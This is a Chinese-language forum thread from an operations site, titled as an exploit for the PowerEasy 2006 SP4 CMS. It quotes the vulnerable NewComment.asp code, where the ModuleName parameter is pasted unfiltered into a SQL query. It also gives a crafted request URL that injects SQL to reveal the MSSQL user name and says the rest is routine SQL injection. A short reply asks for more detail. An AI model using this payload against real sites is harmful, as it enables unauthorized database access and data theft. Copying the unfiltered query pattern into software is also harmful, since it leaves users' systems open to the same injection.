服务器维护,服务器代维,安全设置,漏洞扫描,入侵检测服务

运维之家

 找回密码
 注册
搜索
查看: 4302|回复: 1

动易2006SP4的漏洞利用

[复制链接]
dirtysea 发表于 2007-1-27 21:25:15 | 显示全部楼层 |阅读模式
今天BCT把动易SP4的漏洞公布了,既然都公布了,那么还是发出来吧!
在NewComment.asp文件中
ModuleName = Trim(request("ModuleName"))
这个ModuleName变量没过滤好,从而导致,我们可以在下面的SQL语句中构造我们的
SQL语句
If ModuleName <> "" Then
 If ChannelID <> 0 Then
 If ClassID <> 0 Then
 sqlComment = "Select top " & Num & " C.* from PE_Comment C left join PE_" & ModuleName & " A on C.InfoID=A." & ModuleName & "ID where A.ChannelID= " & ChannelID & " and A.ClassID= " & ClassID & " and C.Passed =" & PE_True

sqlComment = "Select top " & Num & " C.* from PE_Comment C left join PE_" & Article+A+on+C.InfoID=A.ArticleID+where+A.ChannelID=1+and+1=1
在A.ChannelID=1后就可以构造我们的SQL语句。(其中空格用+来代替。)
NewComment.asp?num=1&ChannelID=1&ClassID=1&ModuleName=Article+A+on+C.InfoID=A.ArticleID+where+A.ChannelID=1%20and%20user>0--
例如这样就可以暴mssql用户名
省下的就是sql注入了
cnhawker 发表于 2006-5-18 03:27:51 | 显示全部楼层

re:动易2006SP4的漏洞利用

老大,还有更加详细的吗?

这个自己都有啊

您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|小黑屋|手机版|Archiver|运维之家

GMT+8, 2024-4-26 01:02 , Processed in 0.134235 second(s), 14 queries .

Powered by Dirtysea

© 2008-2020 Dirtysea.com.

快速回复 返回顶部 返回列表